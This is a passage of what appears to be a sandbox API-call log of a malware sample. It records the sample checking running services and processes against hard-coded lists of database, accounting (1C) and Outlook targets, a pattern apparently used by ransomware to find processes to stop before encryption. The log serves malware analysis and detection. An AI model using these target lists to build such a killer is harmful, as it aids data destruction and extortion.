-1 [0042.989] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0042.989] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0042.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0042.989] lstrlenW (lpString="NlaSvc") returned 6 [0042.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0042.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0042.989] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0042.989] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0042.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0042.989] lstrlenW (lpString="nsi") returned 3 [0042.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0042.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0042.989] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0042.990] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0042.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0042.990] lstrlenW (lpString="PcaSvc") returned 6 [0042.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0042.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0042.990] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0042.990] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0042.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0042.990] lstrlenW (lpString="PlugPlay") returned 8 [0042.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0042.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0042.990] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0042.990] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0042.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0042.990] lstrlenW (lpString="Power") returned 5 [0042.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0042.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0042.990] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0042.990] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0042.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0042.990] lstrlenW (lpString="ProfSvc") returned 7 [0042.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0042.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0042.990] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0042.990] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0042.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0042.990] lstrlenW (lpString="RpcEptMapper") returned 12 [0042.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.990] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0042.990] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0042.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0042.990] lstrlenW (lpString="RpcSs") returned 5 [0042.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0042.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0042.991] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0042.991] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0042.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0042.991] lstrlenW (lpString="SamSs") returned 5 [0042.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0042.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0042.991] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0042.991] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0042.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0042.991] lstrlenW (lpString="Schedule") returned 8 [0042.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0042.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0042.991] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0042.991] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0042.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0042.991] lstrlenW (lpString="SENS") returned 4 [0042.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0042.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0042.991] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0042.991] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0042.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0042.991] lstrlenW (lpString="ShellHWDetection") returned 16 [0042.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.991] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0042.991] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0042.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0042.991] lstrlenW (lpString="Spooler") returned 7 [0042.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0042.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0042.991] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0042.992] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0042.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0042.992] lstrlenW (lpString="swprv") returned 5 [0042.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0042.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0042.992] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0042.992] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0042.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0042.999] lstrlenW (lpString="SysMain") returned 7 [0042.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0042.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0043.000] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0043.000] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0043.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0043.000] lstrlenW (lpString="Themes") returned 6 [0043.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0043.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0043.000] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0043.000] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0043.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0043.000] lstrlenW (lpString="TrkWks") returned 6 [0043.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0043.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0043.000] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0043.000] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0043.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0043.000] lstrlenW (lpString="UxSms") returned 5 [0043.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0043.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0043.000] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0043.000] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0043.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0043.000] lstrlenW (lpString="VSS") returned 3 [0043.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0043.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0043.000] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0043.000] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0043.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0043.000] lstrlenW (lpString="WdiServiceHost") returned 14 [0043.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0043.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0043.000] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0043.000] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0043.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0043.001] lstrlenW (lpString="WdiSystemHost") returned 13 [0043.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0043.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0043.001] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0043.001] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0043.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0043.001] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0043.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0043.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0043.001] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0043.001] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0043.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0043.001] lstrlenW (lpString="Winmgmt") returned 7 [0043.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0043.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0043.001] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0043.001] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0043.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0043.001] lstrlenW (lpString="WPDBusEnum") returned 10 [0043.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0043.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0043.001] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0043.001] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0043.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0043.001] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3800fb0 | out: hHeap=0x5f0000) returned 1 [0043.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a8 [0043.009] Process32FirstW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0043.009] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0043.010] lstrlenW (lpString="System") returned 6 [0043.010] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0043.010] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0043.010] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0043.010] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0043.010] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0043.010] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0043.010] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0043.010] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0043.011] lstrlenW (lpString="smss.exe") returned 8 [0043.011] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0043.011] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0043.011] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0043.011] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0043.011] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0043.011] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0043.011] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0043.011] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.012] lstrlenW (lpString="csrss.exe") returned 9 [0043.012] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0043.012] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0043.012] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0043.012] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0043.012] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0043.012] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0043.012] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0043.012] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0043.012] lstrlenW (lpString="wininit.exe") returned 11 [0043.012] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0043.012] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0043.012] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0043.013] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.013] lstrlenW (lpString="csrss.exe") returned 9 [0043.013] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0043.014] lstrlenW (lpString="winlogon.exe") returned 12 [0043.014] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0043.015] lstrlenW (lpString="services.exe") returned 12 [0043.015] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0043.015] lstrlenW (lpString="lsass.exe") returned 9 [0043.016] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0043.016] lstrlenW (lpString="lsm.exe") returned 7 [0043.016] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.017] lstrlenW (lpString="svchost.exe") returned 11 [0043.017] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.018] lstrlenW (lpString="svchost.exe") returned 11 [0043.018] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.018] lstrlenW (lpString="svchost.exe") returned 11 [0043.018] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.019] lstrlenW (lpString="svchost.exe") returned 11 [0043.019] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.020] lstrlenW (lpString="svchost.exe") returned 11 [0043.020] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0043.020] lstrlenW (lpString="audiodg.exe") returned 11 [0043.020] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.021] lstrlenW (lpString="svchost.exe") returned 11 [0043.021] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.022] lstrlenW (lpString="svchost.exe") returned 11 [0043.022] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0043.022] lstrlenW (lpString="dwm.exe") returned 7 [0043.022] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0043.023] lstrlenW (lpString="explorer.exe") returned 12 [0043.023] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0043.024] lstrlenW (lpString="spoolsv.exe") returned 11 [0043.024] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0043.025] lstrlenW (lpString="taskhost.exe") returned 12 [0043.025] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.025] lstrlenW (lpString="svchost.exe") returned 11 [0043.025] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0043.026] lstrlenW (lpString="taskeng.exe") returned 11 [0043.026] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0043.027] lstrlenW (lpString="taskhost.exe") returned 12 [0043.027] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0043.027] lstrlenW (lpString="entrepreneur.exe") returned 16 [0043.027] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0043.028] lstrlenW (lpString="andrew kinds.exe") returned 16 [0043.028] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0043.029] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0043.029] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0043.030] lstrlenW (lpString="educated.exe") returned 12 [0043.030] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0043.030] lstrlenW (lpString="servers.exe") returned 11 [0043.030] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0043.031] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0043.031] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0043.032] lstrlenW (lpString="gbp_chair.exe") returned 13 [0043.032] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0043.032] lstrlenW (lpString="attention infected.exe") returned 22 [0043.032] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0043.033] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0043.033] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, 